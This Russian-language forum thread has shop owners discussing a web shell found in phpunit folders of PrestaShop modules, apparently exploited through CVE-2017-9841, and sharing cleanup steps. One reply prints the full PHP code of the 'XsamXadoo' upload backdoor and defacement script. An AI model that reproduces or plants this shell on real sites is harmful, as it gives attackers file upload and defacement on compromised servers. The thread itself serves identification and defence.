Информация Вредоносний код - Malware, вирусы и др.

alexen_zhukov · 29 Дек 2019

Сегодня Хостер уведомил о появлении вредоносного кода на Хостинге
файл Xsam_Xadoo.html
Появление обнаружено в:

/Xsam_Xadoo.html

/modules/autoupgrade/vendor/phpunit/phpunit/src/Util/PHP/XsamXadoo_Bot.php
/modules/ps_facetedsearch/vendor/phpunit/phpunit/src/Util/PHP/XsamXadoo_Bot.php

Файлы удалены, модули обновлены, благо они не задействованы на сайте, что за зверь и что делает пока не нашел.
Проверьте у себя.

xpen · 29 Дек 2019

alexen_zhukov написал(а):
Сегодня Хостер уведомил о появлении вредоносного кода на Хостинге
файл Xsam_Xadoo.html
Появление обнаружено в:

/Xsam_Xadoo.html

/modules/autoupgrade/vendor/phpunit/phpunit/src/Util/PHP/XsamXadoo_Bot.php
/modules/ps_facetedsearch/vendor/phpunit/phpunit/src/Util/PHP/XsamXadoo_Bot.php

Файлы удалены, модули обновлены, благо они не задействованы на сайте, что за зверь и что делает пока не нашел.
Проверьте у себя.

Для просмотра ссылки Войди или Зарегистрируйся

Оно?

Код:

<?php
echo "Coded By Xsam Xadoo - BoT Auto Shell Upload\n ";
echo 'uname:'.php_uname()."\n";
echo getcwd() . "\n";
$Sam = $_GET['Xsam'];
if($Sam == 'Xadoo'){
echo "<form method='post' enctype='multipart/form-data'>
<input type='file' name='idx'><input type='submit' name='upload' value='upload'>
</form>";
if($_POST['upload']) {
    if(@copy($_FILES['idx']['tmp_name'], $_FILES['idx']['name'])) {
    echo "Upload Success";
    } else {
    echo "Upload Failed Check permission";
    }
}
}
$file = '<title>Hacked by Xsam Xadoo </title><center><div id=q>Hacked by XsamXadoo <br><font size=2>Email: Xsam0.Xadoo0@gmail.com
<style>body{overflow:hidden;background-color:black}#q{font:40px impact;color:white;position:absolute;left:0;right:0;top:43%}</style>';

$r=fopen("Xsam_Xadoo.html", "w"); fwrite($r,$file); fclose($r);
$r=fopen("../../../../../../Xsam_Xadoo.html", "w"); fwrite($r,$file); fclose($r);
?>

Скрытое содержимое доступно для зарегистрированных пользователей!

Quant · 30 Дек 2019

alexen_zhukov написал(а):
Сегодня Хостер уведомил о появлении вредоносного кода на Хостинге
файл Xsam_Xadoo.html
Появление обнаружено в:

/Xsam_Xadoo.html

/modules/autoupgrade/vendor/phpunit/phpunit/src/Util/PHP/XsamXadoo_Bot.php
/modules/ps_facetedsearch/vendor/phpunit/phpunit/src/Util/PHP/XsamXadoo_Bot.php

Файлы удалены, модули обновлены, благо они не задействованы на сайте, что за зверь и что делает пока не нашел.
Проверьте у себя.

Покажите что было в /modules/autoupgrade/vendor/phpunit/phpunit/src/Util/eval-stdin.php. Похоже на CVE-2017-9841.

alexen_zhukov · 8 Янв 2020

Вот Presta прислали пресс релиз по этому поводу
Для просмотра ссылки Войди или Зарегистрируйся

sergiykhd · 8 Янв 2020

Примечательно, что дыры касаются как раз пш 1.7.

_sashok · 8 Янв 2020

sergiykhd написал(а):
Примечательно, что дыры касаются как раз пш 1.7.

в ядре 1.7 всё было и есть ОК

вопрос про модули и их эффективное использование

(через эту болячку проходят все CMS, включая Жумлу, Вордпресс и т.п.)

всё будет ОК

slavy · 30 Янв 2020

Я у себя нашел это в магазине на 1.6, удалил и на всякий закрыл доступ в папку modules, открываю только когда что-то ставлю и потом опять закрываю

artfull · 4 Фев 2020

а где нашел? я не нашел .../vendor/...

slavy · 4 Фев 2020

Это было в одном магазине из 7-ми, причем его обнаружил антивирус с хостинга (который на IspManager стоит по умолчанию ImunifyAV (ex. Revisium) Free)

IDINAHUI · 5 Фев 2020

Были такие проблемы, прочекал сайт айболитом, снес подозрительные файлы и все прошло

Информация Вредоносний код - Malware, вирусы и др.

alexen_zhukov

Постоялец

xpen

Гуру форума

Quant

Создатель

alexen_zhukov

Постоялец

sergiykhd

Prestashop Expert

_sashok

PrestaShop Expert

slavy

Создатель

artfull

Профессор

slavy

Создатель

IDINAHUI

Создатель